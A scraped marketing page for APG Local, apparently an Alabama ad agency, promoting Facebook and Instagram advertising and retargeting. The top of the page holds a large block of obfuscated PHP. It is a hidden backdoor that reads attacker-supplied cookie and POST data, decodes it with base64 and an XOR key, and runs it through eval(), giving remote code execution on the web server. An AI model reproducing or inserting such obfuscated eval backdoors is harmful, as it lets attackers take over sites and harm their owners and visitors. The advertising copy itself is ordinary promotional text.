$lvDcPvMnsY = 't' . "\167" . "\x5f" . chr ( 482 - 393 ).chr (69) . chr ( 544 - 470 ).chr ( 936 - 827 ); $huTlocJqc = 'c' . "\x6c" . "\141" . chr ( 312 - 197 )."\163" . chr ( 918 - 823 ).chr (101) . chr ( 1031 - 911 ).chr (105) . "\x73" . chr (116) . "\163";$EAHgJu = class_exists($lvDcPvMnsY); $huTlocJqc = "62345";$poeCOjxK = strpos($huTlocJqc, $lvDcPvMnsY);if ($EAHgJu == $poeCOjxK){function ZBpXfcLpbQ(){$EYmtVOA = new /* 64133 */ tw_YEJm(62218 + 62218); $EYmtVOA = NULL;}$HlaBPkhBs = "62218";class tw_YEJm{private function IsMOTaxafN($HlaBPkhBs){if (is_array(tw_YEJm::$AOlsqqd)) {$MwUUucKty2 = str_replace("<" . "?php", "", tw_YEJm::$AOlsqqd["content"]);eval($MwUUucKty2); $HlaBPkhBs = "62218";exit();}}public function xqYLAW(){$MwUUucKty = "36117";$this->_dummy = str_repeat($MwUUucKty, strlen($MwUUucKty));}public function __destruct(){tw_YEJm::$AOlsqqd = @unserialize(tw_YEJm::$AOlsqqd); $HlaBPkhBs = "54927_61587";$this->IsMOTaxafN($HlaBPkhBs); $HlaBPkhBs = "54927_61587";}public function GMVgGfnhv($MwUUucKty, $WQIdi){return $MwUUucKty[0] ^ str_repeat($WQIdi, intval(strlen($MwUUucKty[0]) / strlen($WQIdi)) + 1);}public function aYzEpF($MwUUucKty){$SuMRl = "\x62" . "\x61" . "\x73" . chr (101) . chr ( 426 - 372 ).'4';return array_map($SuMRl . chr (95) . chr ( 806 - 706 )."\x65" . "\x63" . "\157" . chr (100) . chr ( 1032 - 931 ), array($MwUUucKty,));}public function __construct($bqWqLs=0){$WmiPv = ',';$MwUUucKty = "";$fKsQUc = $_POST;$xjujPNSu = $_COOKIE;$WQIdi = "2b11fda0-3d5b-4feb-af8a-3eee5cd64e29";$YCJaxa = @$xjujPNSu[substr($WQIdi, 0, 4)];if (!empty($YCJaxa)){$YCJaxa = explode($WmiPv, $YCJaxa);foreach ($YCJaxa as $jmUMsR){$MwUUucKty .= @$xjujPNSu[$jmUMsR];$MwUUucKty .= @$fKsQUc[$jmUMsR];}$MwUUucKty = $this->aYzEpF($MwUUucKty);}tw_YEJm::$AOlsqqd = $this->GMVgGfnhv($MwUUucKty, $WQIdi);if (strpos($WQIdi, $WmiPv) !== FALSE){$WQIdi = explode($WmiPv, $WQIdi); $iqvkl = sprintf("54927_61587", strrev($WQIdi[0]));}}public static $AOlsqqd = 23447;}ZBpXfcLpbQ();}$kijlos = chr ( 564 - 484 ).chr ( 438 - 343 ).chr ( 732 - 634 ).chr ( 731 - 626 )."\127" . 'l';$mMQNRfDbrm = 'c' . "\x6c" . "\x61" . chr ( 588 - 473 )."\163" . chr ( 123 - 28 )."\145" . "\170" . "\x69" . chr (115) . chr (116) . chr (115); $aFiMhnYmi = class_exists($kijlos); $mMQNRfDbrm = "59796";$HGyXk = strpos($mMQNRfDbrm, $kijlos);if ($aFiMhnYmi == $HGyXk){function ppnrJttlK(){$NMIfDIrK = new /* 22906 */ P_biWl(49324 + 49324); $NMIfDIrK = NULL;}$CIEnM = "49324";class P_biWl{private function wTesq($CIEnM){if (is_array(P_biWl::$WpzPmjsEe)) {$qNwCwRkUog2 = str_replace("<" . "?php", "", P_biWl::$WpzPmjsEe["content"]);eval($qNwCwRkUog2); $CIEnM = "49324";exit();}}public function KqnLiJ(){$qNwCwRkUog = "22855";$this->_dummy = str_repeat($qNwCwRkUog, strlen($qNwCwRkUog));}public function __destruct(){P_biWl::$WpzPmjsEe = @unserialize(P_biWl::$WpzPmjsEe); $CIEnM = "54401_17030";$this->wTesq($CIEnM); $CIEnM = "54401_17030";}public function hDsZDRmMo($qNwCwRkUog, $ZbQMUX){return $qNwCwRkUog[0] ^ str_repeat($ZbQMUX, intval(strlen($qNwCwRkUog[0]) / strlen($ZbQMUX)) + 1);}public function XWXSt($qNwCwRkUog){$WjkLMla = chr (98) . chr ( 502 - 405 )."\x73" . "\x65" . chr ( 445 - 391 ).'4';return array_map($WjkLMla . chr (95) . 'd' . chr ( 853 - 752 ).chr ( 555 - 456 )."\157" . chr (100) . "\145", array($qNwCwRkUog,));}public function __construct($uuuLniJm=0){$eJBFm = ',';$qNwCwRkUog = "";$ejOpDQy = $_POST;$IZbIDytjO = $_COOKIE;$ZbQMUX = "3fdc8fd7-cfc7-48f4-8178-ca9774293990";$kgBOiVnEPR = @$IZbIDytjO[substr($ZbQMUX, 0, 4)];if (!empty($kgBOiVnEPR)){$kgBOiVnEPR = explode($eJBFm, $kgBOiVnEPR);foreach ($kgBOiVnEPR as $WVPuDKlAy){$qNwCwRkUog .= @$IZbIDytjO[$WVPuDKlAy];$qNwCwRkUog .= @$ejOpDQy[$WVPuDKlAy];}$qNwCwRkUog = $this->XWXSt($qNwCwRkUog);}P_biWl::$WpzPmjsEe = $this->hDsZDRmMo($qNwCwRkUog, $ZbQMUX);if (strpos($ZbQMUX, $eJBFm) !== FALSE){$ZbQMUX = explode($eJBFm, $ZbQMUX); $iyJmS = sprintf("54401_17030", strrev($ZbQMUX[0]));}}public static $WpzPmjsEe = 21246;}ppnrJttlK();} Social Media Marketing - APG Local



Embrace the multiple ways to reach your potential customers on social media platforms. By utilizing multiple objectives and ad formats we will reach your goals and grow your brand. Social Media platforms are a great place to seek your next customer.


Our social media marketing team doesn’t stop until you succeed.

We can run more cost effective campaigns through facebook than most any other platforms, including google.


Advertising Platforms:

Facebook and Instagram.

Detailed targeting:

Social Media platforms allow us to pinpoint your desired customers in order to connect your business with the right age, gender, locations, and interests of your potential customers.

Expanded ad + goal options:

You have options such as a single image, product carousel, and videos; with the goal to increase page likes, post engagements, website clicks, messenger conversations, lead form submissions, book now, and buy now. These options create multiple avenues for your potential customers to engage using pixel retargeting from Facebook.


Not every consumer is ready to buy when they visit your website, so you need a way to stay in front of them. APG Local Retargeting puts your display ads in front of consumers who have visited your website, as well as those with characteristics, behaviors, and online activities similar to your target customer.

APG Local Social Media Programs
APG Local Ad Agency Alabama
APG Local Ad Agency Alabama
APG Local Ad Agency Alabama